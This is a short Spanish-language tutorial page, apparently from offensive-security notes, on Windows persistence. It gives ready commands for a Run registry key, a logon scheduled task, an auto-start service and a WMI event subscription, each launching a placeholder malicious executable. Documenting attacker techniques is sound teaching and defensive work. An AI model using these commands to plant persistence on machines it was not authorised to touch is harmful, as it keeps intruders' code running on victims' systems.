Persistencia en Windows

Claves del Registro

Modificar claves del registro es una técnica común para lograr persistencia. Al agregar entradas maliciosas en el registro, los atacantes pueden asegurarse de que su código se ejecute automáticamente al iniciar el sistema.

Run/RunOnce:

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MyApp /t REG_SZ /d "C:\ruta\maliciosa.exe"

Tareas Programadas

Los atacantes pueden crear tareas programadas que ejecuten su payload en intervalos regulares o al inicio del sistema.

schtasks:

schtasks /create /sc onlogon /tn "MyTask" /tr "C:\ruta\maliciosa.exe"

Servicios de Windows

Crear o modificar servicios de Windows para que ejecuten el payload al inicio del sistema.

sc:

sc create MyService binPath= "C:\ruta\maliciosa.exe" start= auto

WMI Event Subscription

Utilizar WMI para suscribirse a eventos del sistema y ejecutar código malicioso en respuesta a ciertos eventos, como el inicio del sistema.

PowerShell:

$filter = Set-WmiInstance -Namespace "root\subscription" -Class __EventFilter -Arguments @{
    Name = "MyEventFilter";
    EventNamespace = "root\cimv2";
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime'";
    QueryLanguage = "WQL";
}
$consumer = Set-WmiInstance -Namespace "root\subscription" -Class CommandLineEventConsumer -Arguments @{
    Name = "MyConsumer";
    CommandLineTemplate = "C:\ruta\maliciosa.exe";
}
Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{
    Filter = $filter;
    Consumer = $consumer;
}

AnteriorFundamentos de Persistencia SiguientePersistencia en Linux

Última actualización hace 1 año

hashtagClaves del Registro

hashtagTareas Programadas

hashtagServicios de Windows

hashtagWMI Event Subscription

Claves del Registro

Tareas Programadas

Servicios de Windows

WMI Event Subscription